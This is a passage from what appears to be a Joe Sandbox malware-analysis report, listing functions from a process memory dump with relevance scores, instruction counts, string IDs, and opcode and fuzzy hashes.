                                                                                • Instruction Fuzzy Hash: 851102B6C007498FCB20DF9AE544A9EFBF4FF88218F10856AD819B7210D379A545CFA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 015AF635 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3211839701.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_15a0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: PH]q
                                                                                • API String ID: 0-3168235125
                                                                                • Opcode ID: c487477748419fb785f14f9d27006886d55d2b30703abe1104bfa6748f091c66
                                                                                • Instruction ID: 8fb2b98d912fb8a416c0cbe8d9edf233f159af06d144e2a42b9edd5fc73b1907
                                                                                • Opcode Fuzzy Hash: c487477748419fb785f14f9d27006886d55d2b30703abe1104bfa6748f091c66
                                                                                • Instruction Fuzzy Hash: 06310E30B002028FDB199B38956466E3BF2BF89214F644579D006EF3A5EF38CC4ACB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 015AF648 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3211839701.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_15a0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: PH]q
                                                                                • API String ID: 0-3168235125
                                                                                • Opcode ID: 7156ed56e4ea40c19155b614094049708bf6c5e23d0bbb4b4af05d31af089fd2
                                                                                • Instruction ID: da8d51049989efe775de9ee3243692e33822083aa650b33a54dba2960d5cd794
                                                                                • Opcode Fuzzy Hash: 7156ed56e4ea40c19155b614094049708bf6c5e23d0bbb4b4af05d31af089fd2
                                                                                • Instruction Fuzzy Hash: CB31FE30B002028FDB599B38955066E3BE2BF88654F604539D006EF3A5EE38DC4ACBD1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 015A7208 Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3211839701.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_15a0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: LR]q
                                                                                • API String ID: 0-3081347316
                                                                                • Opcode ID: 309249f3b7cffc6cba893ae94264690e84160e4ef7ea0db1353dc31fc755f587
                                                                                • Instruction ID: e02673bf4e777dae2cab7b55289145c628bbc87cc6edbdffa9f6e0be6558105a
                                                                                • Opcode Fuzzy Hash: 309249f3b7cffc6cba893ae94264690e84160e4ef7ea0db1353dc31fc755f587
                                                                                • Instruction Fuzzy Hash: 52317030E902099BDB15CFA9D45579EB7B2FF89300F61882AE806EB251D7769882CB51
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 015A71F9 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3211839701.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_15a0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: LR]q
                                                                                • API String ID: 0-3081347316
                                                                                • Opcode ID: 93b87c6ee60d0a9ae477093892e0b5f7e41d87dea6a4075863fe631953e52061
                                                                                • Instruction ID: 6e1613695d8b221eac22ccc7e2b75f61cdea722fc6f71190e66ab7274f1a483f
                                                                                • Opcode Fuzzy Hash: 93b87c6ee60d0a9ae477093892e0b5f7e41d87dea6a4075863fe631953e52061
                                                                                • Instruction Fuzzy Hash: 79316330E902169FDF15CFA9D45179EB7B2FF8A300F60852AE805EB251D7769843CB51
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 015A6BA7 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3211839701.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_15a0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: LR]q
                                                                                • API String ID: 0-3081347316
                                                                                • Opcode ID: 5682d05b3e47fe1866811a2aba1e90c865c275612362f7f3c9cc374bd9e88974
                                                                                • Instruction ID: b7cd5c6ffad9e1c922a0ca39927fbab4119bf3b5cdcd66664fb435a2d6f6ff8a
                                                                                • Opcode Fuzzy Hash: 5682d05b3e47fe1866811a2aba1e90c865c275612362f7f3c9cc374bd9e88974
                                                                                • Instruction Fuzzy Hash: 102127317082914FC716AB7CA4642EEBFF1EF86200F1549EEC085CB266DA3A5D4BC791
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 015A7BB0 Relevance: .5, Instructions: 530COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3211839701.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_15a0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fd1b89af2b2e0188b603364507b783f69ad8ffa981199c456548adec9d189502
                                                                                • Instruction ID: 7e1048e6e2a4728465be60a5c4dbf874b00d20e644c7fd7f2b9f6d19a2feaaef
                                                                                • Opcode Fuzzy Hash: fd1b89af2b2e0188b603364507b783f69ad8ffa981199c456548adec9d189502
                                                                                • Instruction Fuzzy Hash: 60125E307801029FDB29AB68E59462D32A7FFC9215BA05939E006DF765CF39EC97C781
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 015A9605 Relevance: .4, Instructions: 431COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3211839701.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_15a0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4a151b51f05a649b6e4288922f0d70d7db45e4fffe81b48b1f18f6b78afc1eb8
                                                                                • Instruction ID: 60705950b74433a7aba4f45969072e10acf6c89a5de200f325d20e769113e518
                                                                                • Opcode Fuzzy Hash: 4a151b51f05a649b6e4288922f0d70d7db45e4fffe81b48b1f18f6b78afc1eb8
                                                                                • Instruction Fuzzy Hash: 36F19034A401168FDB15DFA8D594AADBBF2FF88318F648425E50AEB391DB34DC42CB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 015A4A9C Relevance: .3, Instructions: 262COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3211839701.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_15a0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7823d731db11a6811e107aad19295e62d1745d336a3397b95e84e01dabaaaf10
                                                                                • Instruction ID: 3b7ccb3838349d8c613901cd5ae32acb36d0d5bdab91fd3792a72e7a409ea85d
                                                                                • Opcode Fuzzy Hash: 7823d731db11a6811e107aad19295e62d1745d336a3397b95e84e01dabaaaf10
                                                                                • Instruction Fuzzy Hash: E1B15C70E402098FDF10CFE8D9917DDBBF1BF88314F588529D819AB294EBB49885CB81
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 015A3E84 Relevance: .2, Instructions: 235COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3211839701.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_15a0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4d25e58c4c7dc74579fa400842d037304a1d93f143ba87ede3f095a31a0cfc18
                                                                                • Instruction ID: 9712214de61a2888fcb1c1b98ecc32f367b3d8e68a16434303e0683c77977959
                                                                                • Opcode Fuzzy Hash: 4d25e58c4c7dc74579fa400842d037304a1d93f143ba87ede3f095a31a0cfc18
                                                                                • Instruction Fuzzy Hash: CF916B70E50209DFDF50CFA9D9817ADBBF2BF88308F588129E414AB294EB749845CB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 015A4814 Relevance: .2, Instructions: 181COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3211839701.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_15a0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0e22b77fb76a30bbf0ffb4c28d8a16c5ae9ea60a5993c5d74c338abda44bf260
                                                                                • Instruction ID: 0d54143d84efef98e670b37d218d7bc0fa878a785b2b8be9dfe5b6149d70d29a
                                                                                • Opcode Fuzzy Hash: 0e22b77fb76a30bbf0ffb4c28d8a16c5ae9ea60a5993c5d74c338abda44bf260
                                                                                • Instruction Fuzzy Hash: C0717C70E00249CFDB10CFACD9917DDBBF2BF88314F588129E415AB254EBB49846CB95
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 015A4820 Relevance: .2, Instructions: 180COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3211839701.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_15a0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2ee919afe9d38db5b2ed29a87d214f2d18663f5b914a2aaba6a566869c1b1ceb
                                                                                • Instruction ID: b7664b61d3e15d02a23f8b4c11f79ae667d67c24c402549e8292463592f034c8
                                                                                • Opcode Fuzzy Hash: 2ee919afe9d38db5b2ed29a87d214f2d18663f5b914a2aaba6a566869c1b1ceb
                                                                                • Instruction Fuzzy Hash: E9718C70E00249CFDF10CFA9D99079EBBF2BF88704F588129E418AB254DBB49842CB95
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 015A9AD8 Relevance: .1, Instructions: 137COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3211839701.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_15a0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0056f3f3d12f22b8eca0cc903393a0c7346127427a400b879df4ac6ec041ecb3
                                                                                • Instruction ID: 4d6a32f81f57984b854995f7cbf10846264d51d4eb08c555d89f462797545f60
                                                                                • Opcode Fuzzy Hash: 0056f3f3d12f22b8eca0cc903393a0c7346127427a400b879df4ac6ec041ecb3
                                                                                • Instruction Fuzzy Hash: 77513A75A002098FDB04DFA9E88479DFBB6FF88314F54C1A9E9099F295EB70D845CB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 015A6CF6 Relevance: .1, Instructions: 137COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3211839701.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_15a0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 832e27e24e6f841d5a42fb5db60d9f4e286c19caab492048663744344a0b8e52
                                                                                • Instruction ID: 1f270a4da3f35814883db3fd8664acc8730b011a99cb72ea33c1bffe817c786f
                                                                                • Opcode Fuzzy Hash: 832e27e24e6f841d5a42fb5db60d9f4e286c19caab492048663744344a0b8e52
                                                                                • Instruction Fuzzy Hash: 0E512374D002188FDB14CFA9C895BEEBBF1BF48314F588129E819AB391CB789845CB95
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 015A1128 Relevance: .1, Instructions: 132COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3211839701.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_15a0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: cb40d35c0d8b5e7b2511b79527784292b7a73ede8061f3ab4e03773f2388a35e
                                                                                • Instruction ID: 4d7941b553f86bc2244ad5f41d5e75a76b1a72f7e9704f006df5e10949cc9929
                                                                                • Opcode Fuzzy Hash: cb40d35c0d8b5e7b2511b79527784292b7a73ede8061f3ab4e03773f2388a35e
                                                                                • Instruction Fuzzy Hash: F651FA706022828FCB19EF28F9919587F75FB9570431082BDD0557B23AEB3C6D49DB92
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 015A6D00 Relevance: .1, Instructions: 132COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3211839701.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_15a0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: eb8a20060c94ce858a9e1faa299595b2014c9b5222d6b9bc568474af5b1146e0
                                                                                • Instruction ID: 04bb6d342bd6577a69923a1d4bab1e25c42add43db45e9d336c528e0848d4740
                                                                                • Opcode Fuzzy Hash: eb8a20060c94ce858a9e1faa299595b2014c9b5222d6b9bc568474af5b1146e0
                                                                                • Instruction Fuzzy Hash: 23511374D002188FDB14CFA9C884B9EBBF1BF48314F588529E819AB391DB78A844CB95
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 015A1138 Relevance: .1, Instructions: 112COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3211839701.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_15a0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 29b83fecf80b68734829963b9db6462810dc7b0a193390b0dff7abaffd18403f
                                                                                • Instruction ID: 26055a8dba1d2a42913fb3dca36557907fb560283d081956642ff876e11a6fa2
                                                                                • Opcode Fuzzy Hash: 29b83fecf80b68734829963b9db6462810dc7b0a193390b0dff7abaffd18403f
                                                                                • Instruction Fuzzy Hash: 4151B770602282CFCB19EF28F9919547F7AFB9570430181B9D0557B23AEB3C6D49EB92
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 015AF4F8 Relevance: .1, Instructions: 96COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3211839701.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_15a0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c0e8168f0744d4f521aa667f89d42a0d15188228cda04968ef34b1f9e0f58f92
                                                                                • Instruction ID: 2a8db25e4af3f3131f828baaaad9af230256629df694206574f085b7dfe9d832
                                                                                • Opcode Fuzzy Hash: c0e8168f0744d4f521aa667f89d42a0d15188228cda04968ef34b1f9e0f58f92
                                                                                • Instruction Fuzzy Hash: C2317034E002069BDB19CF69D4946AEBBF2FF89300F54862AE856EB750DB74DC42CB40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 015A26EC Relevance: .1, Instructions: 96COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3211839701.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_15a0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e89a203da95f02b155e4aa3c401c0a6e5ec11dd1ca215428248d9c4ce8eba115
                                                                                • Instruction ID: b87c7a8e4a80a83e6236866a06cd196f7c30b1b7d983f662977f7698cab4ce57
                                                                                • Opcode Fuzzy Hash: e89a203da95f02b155e4aa3c401c0a6e5ec11dd1ca215428248d9c4ce8eba115
                                                                                • Instruction Fuzzy Hash: E4410EB0D003499FDB10CFA9C585ADEBFF5FF48314F64802AE809AB254DB799946CB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 015A50A8 Relevance: .1, Instructions: 94COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3211839701.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_15a0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1ac865294e477851ee03fa13b0b942c87dea9ffa7e98b41752234bc7c6171f94
                                                                                • Instruction ID: 888a9c55ee776107ecff3549bb37b2c240d9fb7945a9ec7d1ffaeb113e6f5839
                                                                                • Opcode Fuzzy Hash: 1ac865294e477851ee03fa13b0b942c87dea9ffa7e98b41752234bc7c6171f94
                                                                                • Instruction Fuzzy Hash: 7D313B30A502158FDB25AF78C954AAD77B2BF88244F5004B8D942AB361EB3A9D06CB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 015AF508 Relevance: .1, Instructions: 91COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3211839701.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_15a0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d1a842f248c20f0385684e1b55b7df30f2aa4b1757d2cefb866efbf233589d24
                                                                                • Instruction ID: d2bb7026ccfcdcf69a898ef5b53fb4c4d66f86f5d747b09be2cb027d06f0f224
                                                                                • Opcode Fuzzy Hash: d1a842f248c20f0385684e1b55b7df30f2aa4b1757d2cefb866efbf233589d24
                                                                                • Instruction Fuzzy Hash: FF314D34E102059BDB19DFA9D4546AEBBF6FF89304F54852AE846EB350DB70EC42CB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 015A26F8 Relevance: .1, Instructions: 90COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3211839701.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_15a0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4f1ec0d4d8b85df8d9f89390200c1d8a8ef41107fc9b4fcd8d73c5aae98c28e0
                                                                                • Instruction ID: 1e515690e3bdf768942d97198004ee863e9db664c6adaa91b46863064d4e2a8d
                                                                                • Opcode Fuzzy Hash: 4f1ec0d4d8b85df8d9f89390200c1d8a8ef41107fc9b4fcd8d73c5aae98c28e0
                                                                                • Instruction Fuzzy Hash: 7A410EB0D003499FDB14DFA9C580ADEBFF5FF48300F608029E809AB254DB75A945CB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 015A50B8 Relevance: .1, Instructions: 89COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3211839701.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_15a0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: efe3a40c4d78fd6c2177b50cdf1f1213d8e05e4fec786dafd39942b0ac94262d
                                                                                • Instruction ID: 6e363c8e0327db9c27b903d444612e98895bf4f14f21fef5e8e968e120bc4226
                                                                                • Opcode Fuzzy Hash: efe3a40c4d78fd6c2177b50cdf1f1213d8e05e4fec786dafd39942b0ac94262d
                                                                                • Instruction Fuzzy Hash: F2313C34B80215CFDB15EB68C950AAE77B6FF88244F5004B8D546AF3A0EB3ADD05CB95
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 015A1380 Relevance: .1, Instructions: 83COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3211839701.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_15a0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5d5465c70e5da5ddabf7c4d79e0a22804645d09dc7c58ba1bc81de8359704f7f
                                                                                • Instruction ID: b0b57baa2ac30fc05a6008ac076f6f2055c1b65b326b0abe86489e9a42251689
                                                                                • Opcode Fuzzy Hash: 5d5465c70e5da5ddabf7c4d79e0a22804645d09dc7c58ba1bc81de8359704f7f
                                                                                • Instruction Fuzzy Hash: 1021D030AC06014FEB369AADE2D836D3B65F742325FA0087AE40ACF691D729CC82C741
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 015A16B0 Relevance: .1, Instructions: 83COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3211839701.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_15a0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 70a13a8596435d839f68b02ccc2f8d47efa3a83ee5e4263b21d8a9f61326b87d
                                                                                • Instruction ID: b114c88db837a46fc7309722fbe04d74fecb23aba174389d7a6dd23eebb1ff77
                                                                                • Opcode Fuzzy Hash: 70a13a8596435d839f68b02ccc2f8d47efa3a83ee5e4263b21d8a9f61326b87d
                                                                                • Instruction Fuzzy Hash: E121AD34A805014FEF22EF68F9C4B6D3B29FB45614F605971D44ADB266EA3CCC46CB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 015A9499 Relevance: .1, Instructions: 82COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3211839701.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_15a0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 038abd07bdd56023dfe1c071113063536ea187112d01d9ae9ad3cc148496496a
                                                                                • Instruction ID: f1c2760041aa10863cd843277ff58960259f6f37dc36700ccb2c91929555a6a7
                                                                                • Opcode Fuzzy Hash: 038abd07bdd56023dfe1c071113063536ea187112d01d9ae9ad3cc148496496a
                                                                                • Instruction Fuzzy Hash: 1D31C334E4021A9BDB19CFA8D48069EFBB2FF89304F54C629E845EB251DB74DC42CB81
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 015A94A8 Relevance: .1, Instructions: 78COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3211839701.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_15a0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 792fdb273ade6e2c4d5a8de70c8047bc254e1bb386f63d83417e09fc07df06ab
                                                                                • Instruction ID: a51e1c678aebdee5fe0a2006323eb233099ea3517966f6464a4beb36ffdf246c
                                                                                • Opcode Fuzzy Hash: 792fdb273ade6e2c4d5a8de70c8047bc254e1bb386f63d83417e09fc07df06ab
                                                                                • Instruction Fuzzy Hash: 7F21B134E0021A9BDB19CFA8D48069EFBB6FF89304F50C629E845BB251DB70D842CB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 015A9398 Relevance: .1, Instructions: 76COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3211839701.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_15a0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: dc1254d1c7622d4f3d230fc239cfd80c2468431dffbacaa505eb30883525fb74
                                                                                • Instruction ID: d033d841de82c39943762a2111966cb79fbf9cf65f3c10b3cd9f942b559bb472
                                                                                • Opcode Fuzzy Hash: dc1254d1c7622d4f3d230fc239cfd80c2468431dffbacaa505eb30883525fb74
                                                                                • Instruction Fuzzy Hash: F5219231E006269BCB19CF68C4906EEBBF2BF89314F50861AE815EB340DB759946CB51
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 015A9C62 Relevance: .1, Instructions: 75COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3211839701.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_15a0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 48301c6a7119545251b075483b61b175fd00b462c4937e1a5c82feb3e35bed62
                                                                                • Instruction ID: 206c5ce0830f12bc9abb7b79439553a4d3c3e9533e70a244e42f23c698afce4c
                                                                                • Opcode Fuzzy Hash: 48301c6a7119545251b075483b61b175fd00b462c4937e1a5c82feb3e35bed62
                                                                                • Instruction Fuzzy Hash: EE21C170A801258FEB04CB6CC968BAE7BF6BF88714F508069E501EF3A4DB718C01CB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 015A9C70 Relevance: .1, Instructions: 74COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3211839701.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_15a0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: da215db4fca577ef1c2b576dfec14369675c5e60bae49afb193608218cee61b2
                                                                                • Instruction ID: 8365407cab5c3aa5b64e817e8b7ce5a97e398b14cec0a21c9f0bae36bdbdd9ab
                                                                                • Opcode Fuzzy Hash: da215db4fca577ef1c2b576dfec14369675c5e60bae49afb193608218cee61b2
                                                                                • Instruction Fuzzy Hash: 2121AF71A501258FEB14DB69C954BAE7BF6BF88718F508129E501EF3A4DA718C408BA0
                                                                                Uniqueness

